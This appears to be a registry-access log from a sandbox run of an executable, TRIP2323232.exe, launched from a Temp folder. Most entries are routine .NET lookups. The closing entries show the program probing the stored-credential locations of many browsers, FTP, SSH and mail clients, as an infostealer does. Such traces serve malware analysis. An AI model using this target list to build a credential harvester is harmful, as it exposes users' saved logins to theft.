HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TRIP2323232.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\443e7d6a\2a202db1
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index36
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1ca07f81\172a5a26
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|TRIP2323232.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|TRIP2323232.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|TRIP2323232.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1ca07f81\722f814
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Macromedia
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
